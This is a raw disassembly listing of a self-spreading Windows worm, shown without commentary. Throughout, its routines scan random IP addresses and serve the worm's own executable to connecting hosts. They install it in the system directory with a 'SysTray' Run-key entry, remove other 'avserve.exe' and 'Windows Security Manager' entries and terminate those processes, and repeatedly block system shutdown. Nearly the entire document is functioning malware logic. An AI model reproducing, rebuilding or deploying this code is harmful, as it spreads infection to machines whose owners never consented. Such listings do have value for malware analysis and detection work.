test eax, eax
jnz short loc_402987
call dword_4010B8 ; GetTickCount
lea ecx, [ebp+30h]
push offset a1_0 ; "-1"
push ecx
mov ecx, ebp
mov dword_404FC0, eax
mov dword_404F98, 1
call sub_402400
loc_402987: ; CODE XREF: sub_402850+C9�j
; sub_402850+D7�j ...
lea edx, [esp+274h+var_200]
push offset aI ; "i"
push edx
call esi ; lstrcmp
test eax, eax
jnz short loc_4029C7
mov eax, dword_404FFC
mov ecx, dword_404FC8
push eax
push ecx
lea edx, [esp+27Ch+var_264]
push offset aDD7 ; "%d,%d,7"
push edx
call dword_4010FC ; wsprintfA
add esp, 10h
lea eax, [esp+274h+var_264]
lea ecx, [ebp+30h]
push eax
push ecx
mov ecx, ebp
call sub_402400
loc_4029C7: ; CODE XREF: sub_402850+145�j
lea edx, [esp+274h+var_200]
push offset aQ ; "q"
push edx
call esi ; lstrcmp
test eax, eax
jnz short loc_4029EF
mov eax, dword_404F98
test eax, eax
jz short loc_4029EF
mov ecx, ebp
call sub_402240
push 0
call dword_4010C0 ; ExitProcess
loc_4029EF: ; CODE XREF: sub_402850+185�j
; sub_402850+18E�j
mov byte ptr [edi], 7Ch
loc_4029F2: ; CODE XREF: sub_402850+3F�j
; sub_402850+4F�j ...
mov eax, dword_404F98
pop edi
pop esi
pop ebp
test eax, eax
pop ebx
jz short loc_402A1D
mov eax, [esp+264h+arg_0]
push offset aJoin ; "JOIN"
push eax
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz short loc_402A1D
call sub_403750 ; rand
loc_402A1D: ; CODE XREF: sub_402850+1AD�j
; sub_402850+1C6�j
add esp, 264h
retn 4
sub_402850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A30 proc near ; CODE XREF: sub_401530+5�p
; sub_402490+66�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_4010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call sub_4037B0 ; srand
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A70 proc near ; CODE XREF: UPX0:00402DE3�p
; UPX0:00402DED�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push eax
push 1
push 0
call dword_4010C8 ; CreateMutexA
retn
sub_402A70 endp
; =============== S U B R O U T I N E =======================================
sub_402A80 proc near ; CODE XREF: sub_402C60+121�p
; UPX0:00402E38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push eax
push 0
push ecx
push edx
push 0
push 0
call dword_4010A8 ; CreateThread
push eax
call dword_401084 ; CloseHandle
retn
sub_402A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_401E20+8E�p
; sub_401E20+164�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
xor esi, esi
test edi, edi
jle short loc_402AE1
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_402AC1: ; CODE XREF: sub_402AB0+27�j
call sub_403750 ; rand
cdq
mov ecx, 1Ah
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_402AC1
mov byte ptr [ebx+edi], 0
pop ebx
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AE1: ; CODE XREF: sub_402AB0+A�j
mov edx, [esp+8+arg_0]
mov byte ptr [edx+edi], 0
pop edi
pop esi
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AF0 proc near ; CODE XREF: sub_401350+1B5�p
; sub_402710+11F�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_14 = word ptr -14h
arg_0 = dword ptr 4
arg_4 = word ptr 8
sub esp, 54h
push esi
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+5Ch+var_44]
lea edx, [esp+5Ch+var_44]
rep stosd
mov ax, [esp+5Ch+arg_4]
lea ecx, [esp+5Ch+var_54]
push ecx
push edx
push 0
push 0
push 0
mov [esp+70h+var_14], ax
mov eax, [esp+70h+arg_0]
push 0
push 0
push 0
push eax
push 0
mov [esp+84h+var_44], 44h
call dword_4010CC ; CreateProcessA
mov ecx, [esp+5Ch+var_50]
mov edi, dword_401084
push ecx
mov esi, eax
call edi ; CloseHandle
mov edx, [esp+5Ch+var_54]
push edx
call edi ; CloseHandle
mov eax, esi
pop edi
pop esi
add esp, 54h
retn
sub_402AF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B60 proc near ; CODE XREF: sub_401E20+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_401128 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402B7D
test esi, esi
jnz short loc_402B8F
cmp byte ptr [edi], 30h
jz short loc_402B99
loc_402B7D: ; CODE XREF: sub_402B60+12�j
push edi
call dword_40112C ; gethostbyname
test eax, eax
jz short loc_402B8F
mov eax, [eax+0Ch]
mov ecx, [eax]
mov esi, [ecx]
loc_402B8F: ; CODE XREF: sub_402B60+16�j
; sub_402B60+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_402B99
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B99: ; CODE XREF: sub_402B60+1B�j
; sub_402B60+32�j
mov eax, esi
pop edi
pop esi
retn
sub_402B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402BA0 proc near ; CODE XREF: sub_403140+39�p
; UPX0:loc_40322C�p
var_34 = byte ptr -34h
sub esp, 34h
lea eax, [esp+34h+var_34]
push 31h
push eax
call dword ptr locret_401120
cmp eax, 0FFFFFFFFh
jnz short loc_402BC1
call dword_401124 ; WSAGetLastError
xor eax, eax
add esp, 34h
retn
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA0+13�j
lea ecx, [esp+34h+var_34]
push ecx
call dword_40112C ; gethostbyname
test eax, eax
jnz short loc_402BD9
mov eax, 100007Fh
add esp, 34h
retn
; ---------------------------------------------------------------------------
loc_402BD9: ; CODE XREF: sub_402BA0+2E�j
mov edx, [eax+0Ch]
mov eax, [edx]
mov eax, [eax]
add esp, 34h
retn
sub_402BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402BF0 proc near ; CODE XREF: sub_4022B0:loc_4022FA�p
; sub_4022B0+117�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_401110 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_402BF0 endp
; ---------------------------------------------------------------------------
align 10h
loc_402C10: ; DATA XREF: sub_402C60+11C�o
mov eax, dword_404FCC
mov ecx, dword_404FC4
push esi
mov esi, [esp+8]
push 0
push eax
push ecx
push esi
call dword_40115C ; send
push 7D0h
call dword_4010B4 ; Sleep
push offset dword_404FC8
call dword_4010D0 ; InterlockedIncrement
push 2
push esi
call dword_40113C ; shutdown
push esi
call dword_401154 ; closesocket
push 0
call dword_40109C ; ExitThread
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_402C60 proc near ; DATA XREF: UPX0:00402E5B�o
var_134 = byte ptr -134h
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
push edi
mov [ebp+var_1C], esp
call sub_402A30
lea eax, [ebp+var_134]
xor edi, edi
push 104h
push eax
push edi
mov dword_404FC8, edi
call dword_4010DC ; GetModuleFileNameA
push edi
push edi
push 3
push edi
push 1
lea ecx, [ebp+var_134]
push 80000000h
push ecx
call dword_40108C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_402CB7
push 1
call dword_40109C ; ExitThread
loc_402CB7: ; CODE XREF: sub_402C60+4D�j
push edi
push esi
call dword_4010D8 ; GetFileSize
push eax
mov dword_404FCC, eax
call sub_403710
mov ecx, dword_404FCC
add esp, 4
lea edx, [ebp+var_8]
mov dword_404FC4, eax
push edi
push edx
push ecx
push eax
push esi
call dword_4010D4 ; ReadFile
mov edx, [ebp+var_8]
push esi
mov dword_404FCC, edx
call dword_401084 ; CloseHandle
push edi
push 1
push 2
call dword_401140 ; socket
mov esi, eax
xor eax, eax
mov ebx, dword_401148
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_14], edi
mov edi, dword_401144
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov word ptr [ebp+var_18], 2
loc_402D26: ; CODE XREF: sub_402C60+DC�j
; sub_402C60+E4�j ...
call sub_403750 ; rand
add eax, 7D0h
and eax, 1FFFh
test al, al
mov dword_404FF4, eax
jz short loc_402D26
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_402D26
push eax
call edi ; htons
lea edx, [ebp+var_18]
push 10h
push edx
push esi
mov word ptr [ebp+var_18+2], ax
call ebx ; bind
test eax, eax
jnz short loc_402D26
push 64h
push esi
call dword_40114C ; listen
mov edi, dword_401150
mov [ebp+var_4], 10h
loc_402D70: ; CODE XREF: sub_402C60+129�j
lea eax, [ebp+var_4]
lea ecx, [ebp+var_2C]
push eax
push ecx
push esi
call edi ; accept
push eax
push offset loc_402C10
call sub_402A80
add esp, 8
jmp short loc_402D70
sub_402C60 endp
; ---------------------------------------------------------------------------
align 10h
loc_402D90: ; CODE XREF: UPX1:00407178�j
sub esp, 190h
push esi
push edi
push 0
call dword_401068 ; GetModuleHandleA
mov dword_404FF8, eax
lea eax, [esp+8]
push eax
push 2
call dword_401118 ; WSAStartup
push offset aU ; "-u"
call dword_40106C ; GetCommandLineA
push eax
call sub_403796 ; strstr
mov esi, eax
add esp, 8
neg esi
sbb esi, esi
push offset aFtpupd_exe ; "ftpupd.exe"
neg esi
call dword_401070 ; DeleteFileA
call sub_402A30
push offset aR10 ; "r10"
call sub_402A70
push offset aU6 ; "u6"
call sub_402A70
push offset aU7 ; "u7"
call sub_402A70
push offset aUterm7 ; "uterm7"
call sub_402A70
add esp, 10h
mov dword_404FD0, eax
call dword_401078 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402E23
push 1
call dword_4010C0 ; ExitProcess
loc_402E23: ; CODE XREF: UPX0:00402E19�j
call sub_4034A0
test esi, esi
jnz short loc_402E31
call sub_403610
loc_402E31: ; CODE XREF: UPX0:00402E2A�j
push 0
push offset sub_402EE0
call sub_402A80
mov esi, dword_4010B4
add esp, 8
push 1F4h
call esi ; Sleep
push 0
push offset sub_402500
call sub_402A80
push 0
push offset sub_402C60
call sub_402A80
push 0
push offset sub_4015F0
call sub_402A80
push 0
push offset loc_4031E0
call sub_402A80
mov edi, dword_401018
add esp, 20h
loc_402E86: ; CODE XREF: UPX0:00402E91�j
push 0
call edi ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_402E86
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402EA0 proc near ; CODE XREF: sub_402EE0+12A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
xor edx, edx
repne scasb
not ecx
dec ecx
jz short loc_402ED6
loc_402EB6: ; CODE XREF: sub_402EA0+34�j
mov al, [edx+esi]
cmp al, 0Ah
jz short loc_402EC1
cmp al, 0Dh
jnz short loc_402EC5
loc_402EC1: ; CODE XREF: sub_402EA0+1B�j
mov byte ptr [edx+esi], 0
loc_402EC5: ; CODE XREF: sub_402EA0+1F�j
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
inc edx
repne scasb
not ecx
dec ecx
cmp edx, ecx
jb short loc_402EB6
loc_402ED6: ; CODE XREF: sub_402EA0+14�j
pop edi
pop esi
retn
sub_402EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EE0 proc near ; DATA XREF: UPX0:00402E33�o
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
mov [ebp+var_8], esp
call sub_402A30
call sub_403750 ; rand
and eax, 80000003h
jns short loc_402F04
dec eax
or eax, 0FFFFFFFCh
inc eax
loc_402F04: ; CODE XREF: sub_402EE0+1D�j
add eax, 3
push eax
lea eax, [ebp+var_48]
push eax
call sub_402AB0
lea edi, [ebp+var_48]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 8
repne scasb
not ecx
sub edi, ecx
push eax
mov edx, ecx
mov esi, edi
mov edi, offset dword_404FD4
push 1
shr ecx, 2
rep movsd
mov ecx, edx
push 2
and ecx, 3
mov [ebp+var_4], 10h
rep movsb
call dword_401140 ; socket
mov esi, eax
push 0
mov [ebp+var_8], esi
mov [ebp+var_18], 2
call dword_40111C ; htonl
push 71h
mov [ebp+var_14], eax
call dword_401144 ; htons
mov [ebp+var_16], ax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_18]
push eax
push ecx
push esi
call dword_401148 ; bind
test eax, eax
jz short loc_402F8B
pop edi
mov eax, 1
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402F8B: ; CODE XREF: sub_402EE0+9C�j
push ebx
push 5
push esi
call dword_40114C ; listen
test eax, eax
jz short loc_402FA7
pop ebx
pop edi
mov eax, 1
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402FA7: ; CODE XREF: sub_402EE0+B7�j
; sub_402EE0+119�j ...
mov edi, dword_401150
lea edx, [ebp+var_4]
lea eax, [ebp+var_28]
push edx
push eax
push esi
call edi ; accept
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_402FD9
loc_402FBF: ; CODE XREF: sub_402EE0+F7�j
push 64h
call dword_4010B4 ; Sleep
lea ecx, [ebp+var_4]
lea edx, [ebp+var_28]
push ecx
push edx
push esi
call edi ; accept
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_402FBF
loc_402FD9: ; CODE XREF: sub_402EE0+DD�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push ebx
call dword_401158 ; recv
test eax, eax
jnz short loc_402FFB
push ebx
call dword_401154 ; closesocket
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402FFB: ; CODE XREF: sub_402EE0+110�j
lea ecx, [ebp+var_148]
mov [ebp+eax+var_148], 0
push ecx
call sub_402EA0
or ecx, 0FFFFFFFFh
mov edi, offset aUseridUnix ; " : USERID : UNIX : "
xor eax, eax
add esp, 4
repne scasb
not ecx
sub edi, ecx
lea edx, [ebp+var_148]
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
lea edx, [ebp+var_148]
and ecx, 3
push eax
rep movsb
mov edi, offset dword_404FD4
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
lea edx, [ebp+var_148]
and ecx, 3
rep movsb
mov edi, offset asc_404DA8 ; "\r\n"
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea edi, [ebp+var_148]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
lea eax, [ebp+var_148]
push ecx
push eax
push ebx
call dword_40115C ; send
push 1388h
call dword_4010B4 ; Sleep
push ebx
call dword_401154 ; closesocket
mov esi, [ebp+var_8]
jmp loc_402FA7
sub_402EE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4030E0 proc near ; DATA XREF: sub_403140+64�o
; UPX0:0040325E�o
var_1 = byte ptr -1
arg_3 = byte ptr 7
push ecx
mov al, [esp+4+arg_3]
push ebx
push esi
mov esi, dword_4010B4
mov [esp+0Ch+var_1], al
xor bl, bl
loc_4030F3: ; CODE XREF: sub_4030E0+4A�j
call sub_402BF0
test eax, eax
jz short loc_40312C
cmp [esp+0Ch+var_1], bl
jz short loc_403125
mov [esp+0Ch+arg_3], bl
mov ecx, [esp+10h]
push ecx
call sub_4016F0
add esp, 4
call sub_403750 ; rand
cdq
mov ecx, 190h
idiv ecx
add edx, ecx
push edx
call esi ; Sleep
loc_403125: ; CODE XREF: sub_4030E0+20�j
inc bl
cmp bl, 0FFh
jb short loc_4030F3
loc_40312C: ; CODE XREF: sub_4030E0+1A�j
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
sub_4030E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403140 proc near ; DATA XREF: UPX0:0040328C�o
var_4 = dword ptr -4
push ecx
push ebx
push esi
push edi
call sub_402A30
mov edi, dword_4010D0
mov ebx, dword_4010B4
loc_403155: ; CODE XREF: sub_403140+44�j
; sub_403140+83�j
call sub_403750 ; rand
mov byte ptr [esp+10h+var_4+1], al
call sub_403750 ; rand
mov byte ptr [esp+10h+var_4+3], al
call sub_403750 ; rand
mov byte ptr [esp+10h+var_4+2], al
call sub_403750 ; rand
mov byte ptr [esp+10h+var_4], al
call sub_402BA0
mov esi, [esp+10h+var_4]
cmp esi, eax
jz short loc_403155
call sub_402BF0
test eax, eax
jz short loc_4031C5
push offset dword_404FFC
call edi ; InterlockedIncrement
push esi
call sub_4016F0
add esp, 4
test eax, eax
jnz short loc_4031B1
push esi
push offset sub_4030E0
call sub_402A80
add esp, 8
loc_4031B1: ; CODE XREF: sub_403140+61�j
call sub_403750 ; rand
cdq
mov ecx, 190h
idiv ecx
add edx, ecx
push edx
call ebx ; Sleep
jmp short loc_403155
; ---------------------------------------------------------------------------
loc_4031C5: ; CODE XREF: sub_403140+4D�j
push 0
call dword_40109C ; ExitThread
pop edi
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
sub_403140 endp
; ---------------------------------------------------------------------------
align 10h
loc_4031E0: ; DATA XREF: UPX0:00402E73�o
push ecx
push ebx
push esi
push edi
mov dword_404FFC, 0
call sub_402BF0
mov edi, dword_4010B4
test eax, eax
jnz short loc_40320D
loc_4031FD: ; CODE XREF: UPX0:0040320B�j
push 1388h
call edi ; Sleep
call sub_402BF0
test eax, eax
jz short loc_4031FD
loc_40320D: ; CODE XREF: UPX0:004031FB�j
lea eax, [esp+0Ch]
push 0
push eax
call dword_401110 ; InternetGetConnectedState
mov al, [esp+0Ch]
mov ebx, 50h
test al, 2
jz short loc_40322C
mov ebx, 12Ch
loc_40322C: ; CODE XREF: UPX0:00403225�j
call sub_402BA0
mov cx, word ptr dword_404FF4
mov esi, eax
push ecx
call dword_401144 ; htons
mov edx, esi
mov word_404122, ax
xor edx, 0AAAAAAAAh
cmp esi, 100007Fh
mov dword_404124, edx
jz short loc_40326B
push esi
push offset sub_4030E0
call sub_402A80
add esp, 8
loc_40326B: ; CODE XREF: UPX0:0040325B�j
; UPX0:004032A3�j ...
call sub_402BF0
test eax, eax
jnz short loc_403284
loc_403274: ; CODE XREF: UPX0:00403282�j
push 1388h
call edi ; Sleep
call sub_402BF0
test eax, eax
jz short loc_403274
loc_403284: ; CODE XREF: UPX0:00403272�j
test ebx, ebx
jle short loc_40329C
mov esi, ebx
loc_40328A: ; CODE XREF: UPX0:0040329A�j
push 0
push offset sub_403140
call sub_402A80
add esp, 8
dec esi
jnz short loc_40328A
loc_40329C: ; CODE XREF: UPX0:00403286�j
call sub_402BF0
test eax, eax
jz short loc_40326B
loc_4032A5: ; CODE XREF: UPX0:004032B3�j
push 0C350h
call edi ; Sleep
call sub_402BF0
test eax, eax
jnz short loc_4032A5
jmp short loc_40326B
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4032C0 proc near ; CODE XREF: sub_4034A0+60�p
; sub_403610+C9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push eax
push 0F003Fh
push 0
push ecx
push edx
call dword_40100C ; RegOpenKeyExA
test eax, eax
jnz short locret_4032FB
mov eax, [esp+arg_8]
mov ecx, [esp+arg_4]
push eax
push ecx
call dword_401010 ; RegDeleteValueA
mov edx, [esp+arg_4]
push edx
call dword_401014 ; RegCloseKey
locret_4032FB: ; CODE XREF: sub_4032C0+1E�j
retn
sub_4032C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403300 proc near ; CODE XREF: sub_4034A0+49�p
; sub_403610+3D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
push ecx
mov eax, [esp+4+arg_10]
mov edx, [esp+4+arg_4]
lea ecx, [esp+4+arg_10]
mov [esp+4+var_4], eax
mov eax, [esp+4+arg_0]
push ecx
push 0F003Fh
push 0
push edx
push eax
call dword_40100C ; RegOpenKeyExA
test eax, eax
jz short loc_403330
mov eax, 1
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403330: ; CODE XREF: sub_403300+27�j
mov edx, [esp+4+arg_C]
lea ecx, [esp+4+var_4]
push ecx
mov ecx, [esp+8+arg_8]
lea eax, [esp+8+arg_4]
push edx
mov edx, [esp+0Ch+arg_10]
push eax
push 0
push ecx
push edx
call dword_401008 ; RegQueryValueExA
test eax, eax
jz short loc_403367
mov eax, [esp+arg_14]
push eax
call dword_401014 ; RegCloseKey
mov eax, 2
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403367: ; CODE XREF: sub_403300+53�j
mov ecx, [esp+arg_14]
push ecx
call dword_401014 ; RegCloseKey
xor eax, eax
pop ecx
retn
sub_403300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403380 proc near ; CODE XREF: sub_403530+A1�p
; sub_403610+5F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push 0
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push ecx
push edx
call dword_401000 ; RegCreateKeyExA
test eax, eax
jz short loc_4033AE
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_4033AE: ; CODE XREF: sub_403380+26�j
mov eax, [esp+arg_10]
mov ecx, [esp+arg_C]
mov edx, [esp+arg_8]
push eax
mov eax, [esp+4+arg_4]
push ecx
push 1
push 0
push edx
push eax
call dword_401004 ; RegSetValueExA
test eax, eax
jz short loc_4033E1
mov ecx, [esp+arg_4]
push ecx
call dword_401014 ; RegCloseKey
mov eax, 2
retn
; ---------------------------------------------------------------------------
loc_4033E1: ; CODE XREF: sub_403380+4E�j
mov edx, [esp+arg_4]
push edx
call dword_401014 ; RegCloseKey
xor eax, eax
retn
sub_403380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4033F0 proc near ; CODE XREF: sub_4034A0+6A�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
sub esp, 128h
push ebx
mov ebx, [esp+12Ch+arg_0]
push ebp
push esi
push edi
push ebx
call dword_4010B0 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_403494
loc_403413: ; CODE XREF: sub_4033F0+2A�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_40341C
dec esi
jns short loc_403413
loc_40341C: ; CODE XREF: sub_4033F0+27�j
push 0
push 2
call sub_4037C2 ; CreateToolhelp32Snapshot
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz short loc_403494
mov ecx, 4Ah
xor eax, eax
lea edi, [esp+138h+var_128]
rep stosd
lea eax, [esp+138h+var_128]
mov [esp+138h+var_128], 128h
push eax
push ebp
call sub_4037BC ; Process32First
test eax, eax
jz short loc_403494
mov edi, dword_40105C
lea ebx, [esi+ebx+1]
mov esi, dword_401060
loc_403460: ; CODE XREF: sub_4033F0+A2�j
lea ecx, [esp+138h+var_104]
push ecx
push ebx
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz short loc_403485
mov edx, [esp+138h+var_120]
push edx
push 0
push 1F0FFFh
call esi ; OpenProcess
push 0
push eax
call edi ; TerminateProcess
loc_403485: ; CODE XREF: sub_4033F0+80�j
lea eax, [esp+138h+var_128]
push eax
push ebp
call sub_4037B6 ; Process32Next
test eax, eax
jnz short loc_403460
loc_403494: ; CODE XREF: sub_4033F0+1D�j
; sub_4033F0+3A�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 128h
retn
sub_4033F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4034A0 proc near ; CODE XREF: UPX0:loc_402E23�p
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
sub esp, 118h
push ebx
push esi
push edi
mov [esp+124h+var_118], offset aWinupdate ; "WinUpdate"
mov [esp+124h+var_114], offset aWindowsSecurit ; "Windows Security Manager"
mov [esp+124h+var_110], offset aAvserve_exe ; "avserve.exe"
mov [esp+124h+var_10C], offset aAvserve2_exe ; "avserve2.exe"
lea edi, [esp+124h+var_118]
mov ebx, 4
loc_4034D2: ; CODE XREF: sub_4034A0+76�j
mov esi, [edi]
lea eax, [esp+124h+var_108]
push 104h
push eax
push esi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_403300
add esp, 14h
test eax, eax
jnz short loc_403512
push esi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_4032C0
lea ecx, [esp+130h+var_108]
push ecx
call sub_4033F0
add esp, 10h
loc_403512: ; CODE XREF: sub_4034A0+53�j
add edi, 4
dec ebx
jnz short loc_4034D2
pop edi
pop esi
pop ebx
add esp, 118h
retn
sub_4034A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403530 proc near ; CODE XREF: sub_403610+6B�p
; sub_403610+E2�p
var_78 = byte ptr -78h
var_64 = byte ptr -64h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
sub esp, 78h
test eax, eax
jz short loc_403542
push eax
call dword_401070 ; DeleteFileA
loc_403542: ; CODE XREF: sub_403530+9�j
lea eax, [esp+78h+var_64]
push 63h
push eax
call dword_401098 ; GetSystemDirectoryA
test eax, eax
jz loc_403607
push esi
call sub_403750 ; rand
and eax, 3
lea ecx, [esp+7Ch+var_78]
add eax, 5
push eax
push ecx
call sub_402AB0
mov esi, dword_4010BC
add esp, 8
lea edx, [esp+7Ch+var_78]
push offset a_exe ; ".exe"
push edx
call esi ; lstrcat
lea eax, [esp+7Ch+var_64]
push offset asc_404D28 ; "\\"
push eax
call esi ; lstrcat
lea ecx, [esp+7Ch+var_78]
lea edx, [esp+7Ch+var_64]
push ecx
push edx
call esi ; lstrcat
mov ecx, [esp+7Ch+arg_4]
lea eax, [esp+7Ch+var_64]
push 0
push eax
push ecx
call dword_40104C ; CopyFileA
lea edx, [esp+7Ch+var_64]
push edx
call dword_4010B0 ; lstrlen
inc eax
push eax
lea eax, [esp+80h+var_64]
push eax
push offset aSystray ; "SysTray"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_403380
mov ecx, dword_404FD0
add esp, 14h
push ecx
call dword_401084 ; CloseHandle
lea edx, [esp+7Ch+var_64]
push 0
push edx
call dword_401050 ; WinExec
push 1F4h
call dword_4010B4 ; Sleep
push 0
call dword_4010C0 ; ExitProcess
pop esi
loc_403607: ; CODE XREF: sub_403530+21�j
add esp, 78h
retn
sub_403530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403610 proc near ; CODE XREF: UPX0:00402E2C�p
var_DC = byte ptr -0DCh
var_C8 = byte ptr -0C8h
var_64 = byte ptr -64h
sub esp, 0DCh
lea eax, [esp+0DCh+var_C8]
push 63h
push eax
push 0
call dword_4010DC ; GetModuleFileNameA
test eax, eax
jz loc_4036FA
lea ecx, [esp+0DCh+var_64]
push 63h
push ecx
push offset aSystray ; "SysTray"
